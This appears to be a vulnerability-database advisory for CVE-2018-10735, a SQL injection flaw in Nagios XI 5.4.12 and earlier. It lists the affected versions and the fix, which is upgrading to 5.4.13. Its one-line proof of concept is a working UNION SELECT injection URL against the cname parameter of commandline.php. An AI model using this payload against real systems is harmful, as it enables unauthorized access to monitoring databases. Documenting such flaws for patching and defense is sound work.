NagiosXI <= 5.4.12... CVE-2018-10735 CNNVD-201805-494

6.5 AV AC AU C I A
发布: 2018-05-16
修订: 2018-06-15

### NagiosXI <= 5.4.12 commandline.php SQL injection(CVE-2018-10735) #### Description A SQL injection issue was discovered in Nagios XI via the admin/commandline.php cname parameter. #### Affected Version * Nagios XI 5.2.x * Nagios XI 5.4.x before 5.4.13 #### Proof of concept ```http http://xxx/nagiosql/admin/commandline.php?cname='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23 ``` ![](https://images.seebug.org/1525858691477-w331s) #### Fix Upgrade to version 5.4.13

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有2条受影响产品信息